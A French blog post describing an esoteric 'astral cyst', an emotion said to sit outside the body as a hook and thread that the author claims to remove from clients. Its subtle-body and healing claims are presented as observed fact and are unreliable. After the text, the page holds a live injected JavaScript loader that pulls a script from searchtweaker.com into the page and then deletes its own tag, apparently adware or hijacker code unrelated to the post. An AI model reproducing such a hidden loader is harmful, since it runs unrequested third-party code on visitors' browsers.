L'émotion tenue à distance de soi

Parfois nommée "kyste astral" dans le jargon de certains magnétiseurs, certaines accumulations émotivo-statiques* sont la manifestation d'une volonté de tenir à l'écart un événement ou une situation, connue pour avoir été difficile.

Photo ajoutée, texte modifié et augmenté le 14 février 2014

Une émotion dans le corps astral n'est pas facile à dénicher visuellement, car il faut ajuster son regard un peu différemment lorsque l'on passe en revue les couches du corps subtil. Elle peut se situer à proximité de la zone séparant les bandes astrales et éthérique, les chevaucher ou y être un peu à part. Une émotion de ce type se caractérise par son accumulation à l'extérieur du corps éthérique et du corps physique. Elle se repère à son contenu plutôt qu'à sa forme. Depuis le corps éthérique, il y a un point assez fin et un fil qui en sort. La différence de teinte est délicate ; au niveau du point, un aspect "pointu" donne l'impression d'un "hameçon".  Le fil est d'apparence cylindrique, creux et courbe ; sa rotation dextrogyre taraude la zone du corps physique auquel il est attaché. Il est difficile de suivre le fil jusque dans le corps astral. La mémoire qui s'y trouve renferme des renseignements essentielles qui expliquent que l'individu les tient à l'écart ; elle ne contient pas d'information analysée, mais à l'état brut ; il s'agit d'un événement précis qui inclus son époque dans une richesse de détails étonnante. Il est donc nécessaire de comprendre cette mémoire dans son contexte ! Ce type de mémoire semble nécessiter une autorisation dépendant du nettoyage effectué préalablement. Toute tentative est autrement voué à l'échec. Le signal se précise lorsque je sens une envie de retirer cette "épine" pour soulager la personne. Après quelques instants, la pointe semble se détacher et se rétracter progressivement. La personne exprime la sensation que quelque chose quitte son corps, et le phénomène ne s'accompagne pas d'émotions. Lorsque le fil disparaît à son tour, la mémoire persiste quelques secondes dans le corps astral puis disparaît totalement. Il ne subsiste ensuite aucune empreinte dans le corps astral.
(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();

Commentaires

Posts les plus consultés de ce blog

L'aura accidenté

l'aura des dents

Les mémoires dans l'inflammation